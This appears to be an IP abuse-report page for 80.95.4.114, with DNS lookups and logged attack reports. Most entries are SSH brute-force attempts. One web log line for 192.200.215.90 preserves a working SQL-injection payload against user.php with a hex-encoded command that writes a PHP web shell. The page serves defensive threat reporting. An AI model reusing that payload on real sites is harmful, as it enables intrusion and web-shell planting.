Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: South Africa

Internet Service Provider: RMS Powertronics CC

Hostname: unknown

Organization: unknown

Usage Type: Commercial

Comments:
Type Details Datetime
attackspambots
Unauthorized connection attempt detected from IP address 80.95.4.114 to port 80 [J]
2020-01-13 18:21:44
Comments on same subnet:
IP Type Details Datetime
80.95.4.166 attackbots
Unauthorized connection attempt detected from IP address 80.95.4.166 to port 80
2020-06-13 05:56:47
80.95.45.238 attack
/ucp.php?mode=register&sid=74fa60a22f9eec2624588824222f22c7
2020-02-11 06:50:17
80.95.44.9 attackbots
/ucp.php?mode=register&sid=164199e5a6397aae47e24e3a39e8f941
2019-09-28 15:47:55
80.95.45.143 attackspam
Unauthorized connection attempt from IP address 80.95.45.143 on Port 445(SMB)
2019-08-27 02:49:56
80.95.45.228 attackbotsspam
Unauthorized connection attempt from IP address 80.95.45.228 on Port 445(SMB)
2019-06-27 05:07:59
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 80.95.4.114
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40351
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;80.95.4.114.			IN	A

;; AUTHORITY SECTION:
.			590	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020011300 1800 900 604800 86400

;; Query time: 77 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Jan 13 18:21:41 CST 2020
;; MSG SIZE  rcvd: 115
Host info
114.4.95.80.in-addr.arpa domain name pointer mt-client-80-95-4.mtnetworks.co.za.
Nslookup info:
Server:		100.100.2.136
Address:	100.100.2.136#53

Non-authoritative answer:
114.4.95.80.in-addr.arpa	name = mt-client-80-95-4.mtnetworks.co.za.

Authoritative answers can be found from:

Related IP info:
Related comments:
IP Type Details Datetime
192.200.215.90 attackspambots
192.200.215.90 - - [22/Aug/2019:04:46:04 -0400] "GET /user.php?act=login HTTP/1.1" 301 251 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
...
2019-08-22 18:40:12
104.248.1.14 attackspam
Aug 22 11:16:09 vps691689 sshd[17248]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.1.14
Aug 22 11:16:10 vps691689 sshd[17248]: Failed password for invalid user team from 104.248.1.14 port 36262 ssh2
...
2019-08-22 17:29:50
51.83.40.213 attack
Aug 21 23:28:48 kapalua sshd\[12837\]: Invalid user 1 from 51.83.40.213
Aug 21 23:28:48 kapalua sshd\[12837\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=213.ip-51-83-40.eu
Aug 21 23:28:50 kapalua sshd\[12837\]: Failed password for invalid user 1 from 51.83.40.213 port 45760 ssh2
Aug 21 23:32:39 kapalua sshd\[13327\]: Invalid user minecraft from 51.83.40.213
Aug 21 23:32:39 kapalua sshd\[13327\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=213.ip-51-83-40.eu
2019-08-22 18:37:50
3.14.253.241 attack
Aug 22 12:50:59 www sshd\[95365\]: Invalid user fuck from 3.14.253.241
Aug 22 12:50:59 www sshd\[95365\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=3.14.253.241
Aug 22 12:51:01 www sshd\[95365\]: Failed password for invalid user fuck from 3.14.253.241 port 42666 ssh2
...
2019-08-22 18:15:16
132.213.238.221 attackbots
Aug 22 10:47:15 OPSO sshd\[13949\]: Invalid user pi from 132.213.238.221 port 59851
Aug 22 10:47:15 OPSO sshd\[13949\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=132.213.238.221
Aug 22 10:47:15 OPSO sshd\[13951\]: Invalid user pi from 132.213.238.221 port 59852
Aug 22 10:47:15 OPSO sshd\[13951\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=132.213.238.221
Aug 22 10:47:16 OPSO sshd\[13949\]: Failed password for invalid user pi from 132.213.238.221 port 59851 ssh2
Aug 22 10:47:16 OPSO sshd\[13951\]: Failed password for invalid user pi from 132.213.238.221 port 59852 ssh2
2019-08-22 17:36:25
73.226.185.33 attackbots
Invalid user admin from 73.226.185.33 port 55526
2019-08-22 17:59:54
14.41.77.225 attackspam
Aug 22 09:58:09 hcbbdb sshd\[28192\]: Invalid user sammy from 14.41.77.225
Aug 22 09:58:09 hcbbdb sshd\[28192\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.41.77.225
Aug 22 09:58:11 hcbbdb sshd\[28192\]: Failed password for invalid user sammy from 14.41.77.225 port 55204 ssh2
Aug 22 10:03:02 hcbbdb sshd\[28710\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.41.77.225  user=root
Aug 22 10:03:04 hcbbdb sshd\[28710\]: Failed password for root from 14.41.77.225 port 44354 ssh2
2019-08-22 18:08:52
163.172.117.140 attack
Aug 22 10:54:03 cp sshd[3391]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=163.172.117.140
2019-08-22 17:50:37
111.231.88.217 attack
Automatic report - Banned IP Access
2019-08-22 17:34:13
128.199.199.113 attackspambots
Aug 22 10:05:35 *** sshd[21469]: Invalid user ripping from 128.199.199.113
2019-08-22 18:08:00
104.248.195.226 attackspambots
Aug 22 11:15:42 vps691689 sshd[17233]: Failed password for ubuntu from 104.248.195.226 port 46806 ssh2
Aug 22 11:19:37 vps691689 sshd[17332]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.195.226
...
2019-08-22 17:21:35
132.255.29.228 attackbotsspam
Invalid user samba from 132.255.29.228 port 57316
2019-08-22 17:28:12
51.68.192.106 attackbotsspam
Aug 22 12:08:58 srv-4 sshd\[11583\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.68.192.106  user=root
Aug 22 12:09:00 srv-4 sshd\[11583\]: Failed password for root from 51.68.192.106 port 39472 ssh2
Aug 22 12:12:50 srv-4 sshd\[11979\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.68.192.106  user=root
...
2019-08-22 17:18:58
167.71.209.74 attackbotsspam
Aug 21 23:58:17 friendsofhawaii sshd\[17415\]: Invalid user frappe from 167.71.209.74
Aug 21 23:58:17 friendsofhawaii sshd\[17415\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.71.209.74
Aug 21 23:58:19 friendsofhawaii sshd\[17415\]: Failed password for invalid user frappe from 167.71.209.74 port 56798 ssh2
Aug 22 00:03:10 friendsofhawaii sshd\[17846\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.71.209.74  user=bin
Aug 22 00:03:12 friendsofhawaii sshd\[17846\]: Failed password for bin from 167.71.209.74 port 46216 ssh2
2019-08-22 18:09:18
217.65.27.132 attackspam
Aug 21 23:37:03 hcbb sshd\[5879\]: Invalid user admin from 217.65.27.132
Aug 21 23:37:03 hcbb sshd\[5879\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.65.27.132
Aug 21 23:37:05 hcbb sshd\[5879\]: Failed password for invalid user admin from 217.65.27.132 port 59342 ssh2
Aug 21 23:41:36 hcbb sshd\[6336\]: Invalid user zabbix from 217.65.27.132
Aug 21 23:41:36 hcbb sshd\[6336\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.65.27.132
2019-08-22 17:45:24

Recently Reported IPs

175.211.66.93 68.37.48.226 117.171.44.92 113.161.180.119
149.48.64.119 52.204.19.100 172.147.126.71 193.56.67.203
140.83.241.193 93.120.133.138 121.139.105.136 36.82.100.207
203.205.35.187 191.55.128.37 151.143.97.188 101.64.40.185
45.123.2.198 45.79.165.143 188.36.110.0 36.71.233.64